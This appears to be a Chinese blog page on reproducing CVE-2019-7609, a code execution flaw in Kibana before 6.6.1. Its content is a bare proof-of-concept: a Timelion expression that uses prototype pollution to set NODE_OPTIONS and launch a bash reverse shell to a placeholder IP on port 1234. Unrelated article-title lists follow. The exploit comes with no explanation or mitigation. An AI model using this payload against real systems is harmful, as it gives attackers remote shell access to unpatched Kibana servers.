Kibana < 6.6.1 代码执行漏洞复现CVE-2019-7609
2024-10-07 18:12:13
登陆kibana
poc
.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -i >& /dev/tcp/xxx.xxx.xxx.xxx/1234 0>&1");process.exit()//')
.props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')
最新文章
- arm 2440 linux 应用程序 nes 红白机模拟器 第4篇 linux 手柄驱动支持
- iOS异步下载下载进度条显示
- PHP的serialize序列化数据与JSON格式化数据
- static in C/C++
- 出现错误ActivityManager: Warning: Activity not started, its current task has been
- Android支付接入(三):电信爱游戏支付
- JNI和NDK的区别
- 【solr基础教程之二】索引
- [iOS]C语言技术视频-15-指针变量高级用法练习一(函数指针完成动态排序)
- eclipse+HBASE开发环境搭建(已实践)
- poj2069
- LNMP环境下搭建wordpress
- vue 路由元信息
- Neutron flat network 学习
- [WC2007]剪刀石头布(最大流)
- 【java】-- 多线程快速入门
- OpenGL.Tutorial03_Matrices_测试
- Java 中12个原子操作类
- Django——权限
- ";她等待刀尖已经太久";--茨维塔耶娃诗抄
热门文章
- RabbitMQ(七)心跳控制 -- heartbeat
- 用 Flask 来写个轻博客 (14) — M(V)C_实现项目首页的模板
- 力扣算法题—143ReorderList
- SpringBoot+Thymeleaf+iView
- Codeforces A Mist of Florescence
- Android开发——回调(Callback)
- Install ncurses (ncurses-devel) and try again
- mysql导入.csv文件出错
- redis的密码设置
- MySQL源码编译与初始化